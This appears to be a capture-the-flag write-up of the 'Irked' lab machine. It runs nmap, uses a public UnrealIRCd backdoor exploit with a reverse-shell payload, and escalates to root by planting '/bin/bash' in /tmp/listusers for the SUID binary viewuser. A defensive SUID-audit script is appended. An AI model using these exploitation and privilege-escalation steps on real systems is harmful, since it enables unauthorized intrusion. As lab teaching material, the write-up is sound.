nmap -Pn -sV -T 4 -A 10.10.10.117
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
| vulners:
| cpe:/a:apache:http_server:2.4.10:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
111/tcp open rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Since port 80 is open, I first opened the IP in a browser and found nothing of interest.
I tried brute-forcing paths, but found no path that could be used.
The only clue was IRC, so I looked up what kind of service IRC is; online sources say IRC uses ports 6667 and 6697.
* IRC (short for Internet Relay Chat) is an application-layer protocol.
* It is mainly used for group chat, but can also be used for one-to-one chat.
* One IRC server can connect to other IRC servers to form an IRC network.
* IRC does not require registration; but if you register, you can force anyone who is using your unique ID offline.
* The IRC protocol is simple and has many open-source implementations; third-party bot programs are extremely numerous, with an implementation in almost every language.
* IRC is the meeting standard of the open-source community, so many of the technical experts of the open-source world hang out there.
Scan ports 6667 and 6697 with nmap
PORT STATE SERVICE VERSION
6667/tcp closed irc
6697/tcp open irc UnrealIRCd
Service Info: Host: irked.htb
Port 6697 is open, and a related exploit was found on exploit-db
First, look for a related exploit
https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor
Add local_ip and local_port in the script
python3 exploit.py 10.10.10.117 6697 -payload python
sudo -l shows that the sudo command is not recognized
But the server has wget, so use wget to download LinEnum.sh
[-] SUID files:
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
There is a suspicious file, /usr/bin/viewuser
ircd@irked:/tmp$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-05-27 10:33 (:0)
sh: 1: /tmp/listusers: not found
After running the file, it reports that /tmp/listusers does not exist, so create that file in the /tmp directory and write a bash script into it
echo /bin/bash >> listusers
chmod 777 listusers
/usr/bin/viewuser
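The root cause above is a SUID binary that runs a fixed path inside a world-writable directory. The following is an added example, not part of the original writeup or of the Irked box: a small POSIX sh audit that lists SUID/SGID files and flags any whose printable strings reference a path under /tmp, /var/tmp or /dev/shm, which is the pattern that made viewuser exploitable. Function names (list_suid, writable_refs, audit_suid), the SUID_AUDIT_RUN variable and the set of directories checked are my own choices; it needs only sh, find and a grep that supports -a, -o and -E.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit SUID/SGID binaries
# for hard-coded paths under world-writable directories. A privileged binary
# that executes a path under /tmp, /var/tmp or /dev/shm (as viewuser does
# with /tmp/listusers) can be hijacked by any local user who creates that
# file first. Needs only POSIX sh, find, and a grep that supports -a -o -E.

# list_suid [ROOT...]: print SUID or SGID regular files under ROOT (default /).
list_suid() {
    [ "$#" -eq 0 ] && set -- /
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# writable_refs FILE: print each distinct path under a world-writable directory
# that occurs as a literal string in FILE. Exit 0 if any was found, else 1.
writable_refs() {
    refs=$(grep -a -oE '/(tmp|var/tmp|dev/shm)(/[A-Za-z0-9._-]+)+' "$1" 2>/dev/null | sort -u)
    [ -n "$refs" ] || return 1
    printf '%s\n' "$refs"
}

# audit_suid [ROOT...]: one "FILE<TAB>PATH" line per suspicious reference
# found in any SUID/SGID file under ROOT. Exit 0 if anything was flagged.
audit_suid() {
    out=$(list_suid "$@" | while IFS= read -r f; do
        writable_refs "$f" | while IFS= read -r p; do
            printf '%s\t%s\n' "$f" "$p"
        done
    done)
    [ -n "$out" ] || return 1
    printf '%s\n' "$out"
}

# Run the audit when executed directly with SUID_AUDIT_RUN=1, e.g.
#   SUID_AUDIT_RUN=1 sh suid_audit.sh /usr /bin /sbin
# (run as root so that every binary is readable).
if [ "${SUID_AUDIT_RUN:-0}" = 1 ]; then
    audit_suid "$@"
fi
```

On a host like the one in the writeup, audit_suid would print a line pairing /usr/bin/viewuser with /tmp/listusers. String matching can miss paths that are built at runtime, so treat a clean result as a first pass, not proof; a SUID binary that needs a helper should keep it under a root-owned directory such as /usr/lib and drop privileges before running anything else.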
Original post: https://www.cnblogs.com/aya82/p/14198910.html